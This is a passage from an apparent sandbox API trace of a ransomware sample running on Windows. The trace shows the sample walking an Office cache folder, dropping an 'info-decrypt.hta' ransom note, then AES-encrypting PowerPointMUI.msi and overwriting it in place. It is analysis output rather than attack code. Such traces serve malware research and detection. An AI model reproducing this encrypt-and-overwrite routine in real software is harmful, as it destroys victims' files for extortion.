lpFilePart=0x0) returned 0x3f [0202.062] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x69deca4 | out: lpFindFileData=0x69deca4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77af30 [0202.106] FindNextFileW (in: hFindFile=0x77af30, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0202.106] FindNextFileW (in: hFindFile=0x77af30, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0202.106] FindNextFileW (in: hFindFile=0x77af30, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0202.107] FindNextFileW (in: hFindFile=0x77af30, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0x0, dwReserved1=0x0, cFileName="PptLR.cab", cAlternateFileName="")) returned 1 [0202.107] FindNextFileW (in: hFindFile=0x77af30, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0202.107] FindNextFileW (in: hFindFile=0x77af30, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0202.107] FindClose (in: hFindFile=0x77af30 | out: hFindFile=0x77af30) returned 1 [0202.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69def3c) returned 1 [0202.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69def48) returned 1 [0202.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69def7c) returned 1 [0202.108] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x69dea84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0202.108] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x69dea58, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0202.108] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x69deca4 | out: lpFindFileData=0x69deca4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77af30 [0202.109] FindNextFileW (in: hFindFile=0x77af30, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0202.109] FindNextFileW (in: hFindFile=0x77af30, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0202.109] FindNextFileW (in: hFindFile=0x77af30, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0202.110] FindNextFileW (in: hFindFile=0x77af30, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0x0, dwReserved1=0x0, cFileName="PptLR.cab", cAlternateFileName="")) returned 1 [0202.110] FindNextFileW (in: hFindFile=0x77af30, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0202.110] FindNextFileW (in: hFindFile=0x77af30, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0202.110] FindClose (in: hFindFile=0x77af30 | out: hFindFile=0x77af30) returned 1 [0202.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69def3c) returned 1 [0202.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69def48) returned 1 [0202.111] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", nBufferLength=0x105, lpBuffer=0x69dea3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpFilePart=0x0) returned 0x50 [0202.111] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", nBufferLength=0x105, lpBuffer=0x69dea34, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpFilePart=0x0) returned 0x50 [0202.111] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x69dea3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0202.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dee9c) returned 1 [0202.111] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x69def18 | out: lpFileInformation=0x69def18*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0202.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dee98) returned 1 [0202.112] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", nBufferLength=0x105, lpBuffer=0x69dea34, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpFilePart=0x0) returned 0x50 [0202.112] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x69de8dc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0202.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dedd0) returned 1 [0202.112] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x5a4 [0202.113] GetFileType (hFile=0x5a4) returned 0x1 [0202.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dedcc) returned 1 [0202.113] GetFileType (hFile=0x5a4) returned 0x1 [0202.113] WriteFile (in: hFile=0x5a4, lpBuffer=0x354ae0c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x69dee94, lpOverlapped=0x0 | out: lpBuffer=0x354ae0c*, lpNumberOfBytesWritten=0x69dee94*=0x1000, lpOverlapped=0x0) returned 1 [0202.114] WriteFile (in: hFile=0x5a4, lpBuffer=0x354ae0c*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x69dee68, lpOverlapped=0x0 | out: lpBuffer=0x354ae0c*, lpNumberOfBytesWritten=0x69dee68*=0x557, lpOverlapped=0x0) returned 1 [0202.114] CloseHandle (hObject=0x5a4) returned 1 [0202.114] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", nBufferLength=0x105, lpBuffer=0x69de9b8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpFilePart=0x0) returned 0x50 [0202.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dee64) returned 1 [0202.114] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x354be28 | out: lpFileInformation=0x354be28*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400)) returned 1 [0202.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dee60) returned 1 [0202.115] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", nBufferLength=0x105, lpBuffer=0x69de8a4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpFilePart=0x0) returned 0x50 [0202.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69ded98) returned 1 [0202.115] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a4 [0202.115] GetFileType (hFile=0x5a4) returned 0x1 [0202.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69ded94) returned 1 [0202.115] GetFileType (hFile=0x5a4) returned 0x1 [0202.115] GetFileSize (in: hFile=0x5a4, lpFileSizeHigh=0x69deea0 | out: lpFileSizeHigh=0x69deea0*=0x0) returned 0x263400 [0202.121] ReadFile (in: hFile=0x5a4, lpBuffer=0x2eee1d58, nNumberOfBytesToRead=0x263400, lpNumberOfBytesRead=0x69dee4c, lpOverlapped=0x0 | out: lpBuffer=0x2eee1d58*, lpNumberOfBytesRead=0x69dee4c*=0x263400, lpOverlapped=0x0) returned 1 [0202.719] CloseHandle (hObject=0x5a4) returned 1 [0202.719] CryptAcquireContextW (in: phProv=0x69dedec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x69dedec*=0x7a9398) returned 1 [0202.721] CryptGenRandom (in: hProv=0x7a9398, dwLen=0x10, pbBuffer=0x34dd170 | out: pbBuffer=0x34dd170) returned 1 [0203.299] CryptImportKey (in: hProv=0x7a9398, pbData=0x3642868, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x69dedbc | out: phKey=0x69dedbc*=0x77af30) returned 1 [0203.299] CryptContextAddRef (hProv=0x7a9398, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.299] CryptContextAddRef (hProv=0x7a9398, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.299] CryptDuplicateKey (in: hKey=0x77af30, pdwReserved=0x0, dwFlags=0x0, phKey=0x69dedac | out: phKey=0x69dedac*=0x77b3b0) returned 1 [0203.299] CryptContextAddRef (hProv=0x7a9398, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.299] CryptSetKeyParam (hKey=0x77b3b0, dwParam=0x4, pbData=0x3642948*=0x1, dwFlags=0x0) returned 1 [0203.299] CryptSetKeyParam (hKey=0x77b3b0, dwParam=0x1, pbData=0x3642914, dwFlags=0x0) returned 1 [0203.321] CryptEncrypt (in: hKey=0x77b3b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f22bc58*, pdwDataLen=0x69dee18*=0x263410, dwBufLen=0x263410 | out: pbData=0x2f22bc58*, pdwDataLen=0x69dee18*=0x263410) returned 1 [0203.341] CryptEncrypt (in: hKey=0x77b3b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3642970*, pdwDataLen=0x69dee20*=0x0, dwBufLen=0x10 | out: pbData=0x3642970*, pdwDataLen=0x69dee20*=0x10) returned 1 [0204.696] CryptDestroyKey (hKey=0x77af30) returned 1 [0204.696] CryptReleaseContext (hProv=0x7a9398, dwFlags=0x0) returned 1 [0204.696] CryptReleaseContext (hProv=0x7a9398, dwFlags=0x0) returned 1 [0204.696] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", nBufferLength=0x105, lpBuffer=0x69de890, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpFilePart=0x0) returned 0x50 [0204.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69ded84) returned 1 [0204.697] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x460 [0204.698] GetFileType (hFile=0x460) returned 0x1 [0204.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69ded80) returned 1 [0204.698] GetFileType (hFile=0x460) returned 0x1 [0204.698] WriteFile (in: hFile=0x460, lpBuffer=0x30fddef8*, nNumberOfBytesToWrite=0x263620, lpNumberOfBytesWritten=0x69dee40, lpOverlapped=0x0 | out: lpBuffer=0x30fddef8*, lpNumberOfBytesWritten=0x69dee40*=0x263620, lpOverlapped=0x0) returned 1 [0204.947] CloseHandle (hObject=0x460) returned 1 [0205.558] CoTaskMemAlloc (cb=0x20c) returned 0x9831858 [0205.558] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9831858 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0205.558] CoTaskMemFree (pv=0x9831858) [0205.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x69de878, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0205.558] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69dedc0 | out: ppv=0x69dedc0*=0x72015c) returned 0x0 [0205.559] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69dedb8 | out: pAptType=0x69dedb8*=1) returned 0x0 [0205.559] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69dedbc | out: ppvObject=0x69dedbc*=0x0) returned 0x80004002 [0205.559] IUnknown:Release (This=0x72015c) returned 0x1 [0205.560] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de728 | out: ppv=0x69de728*=0x6736e08) returned 0x0 [0205.560] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e08, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de940 | out: ppvObject=0x69de940*=0x0) returned 0x80004002 [0205.560] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e08, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de954 | out: ppvObject=0x69de954*=0x6738460) returned 0x0 [0205.560] WbemDefPath:IUnknown:Release (This=0x6736e08) returned 0x0 [0205.560] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de574 | out: ppvObject=0x69de574*=0x6738460) returned 0x0 [0205.560] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de530 | out: ppvObject=0x69de530*=0x0) returned 0x80004002 [0205.560] WbemDefPath:IUnknown:AddRef (This=0x6738460) returned 0x3 [0205.560] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69dde8c | out: ppvObject=0x69dde8c*=0x0) returned 0x80004002 [0205.560] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69dde3c | out: ppvObject=0x69dde3c*=0x0) returned 0x80004002 [0205.560] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69dde48 | out: ppvObject=0x69dde48*=0x9821028) returned 0x0 [0205.561] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9821028, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69dde50 | out: pCid=0x69dde50*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0205.561] WbemDefPath:IUnknown:Release (This=0x9821028) returned 0x3 [0205.561] CoGetContextToken (in: pToken=0x69ddea8 | out: pToken=0x69ddea8) returned 0x0 [0205.561] CoGetContextToken (in: pToken=0x69dde58 | out: pToken=0x69dde58) returned 0x0 [0205.561] CoGetContextToken (in: pToken=0x69de2b0 | out: pToken=0x69de2b0) returned 0x0 [0205.561] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de340 | out: ppvObject=0x69de340*=0x0) returned 0x80004002 [0205.561] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x2 [0205.561] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x1 [0205.561] CoGetContextToken (in: pToken=0x69dec38 | out: pToken=0x69dec38) returned 0x0 [0205.561] CoGetContextToken (in: pToken=0x69deb98 | out: pToken=0x69deb98) returned 0x0 [0205.561] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x69dec68*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x69dec64 | out: ppvObject=0x69dec64*=0x6738460) returned 0x0 [0205.561] WbemDefPath:IUnknown:AddRef (This=0x6738460) returned 0x3 [0205.561] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x2 [0205.561] WbemDefPath:IWbemPath:SetText (This=0x6738460, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0205.561] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x69dedec | out: puCount=0x69dedec*=0x0) returned 0x0 [0205.561] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x69dede8*=0x0, pszText=0x0 | out: puBuffLength=0x69dede8*=0x20, pszText=0x0) returned 0x0 [0205.561] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x69dede8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dede8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0205.561] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738460, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0205.561] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x69dedec | out: puCount=0x69dedec*=0x0) returned 0x0 [0205.561] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738460, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0205.561] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738460, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0205.561] WbemDefPath:IWbemPath:GetNamespaceCount (in: 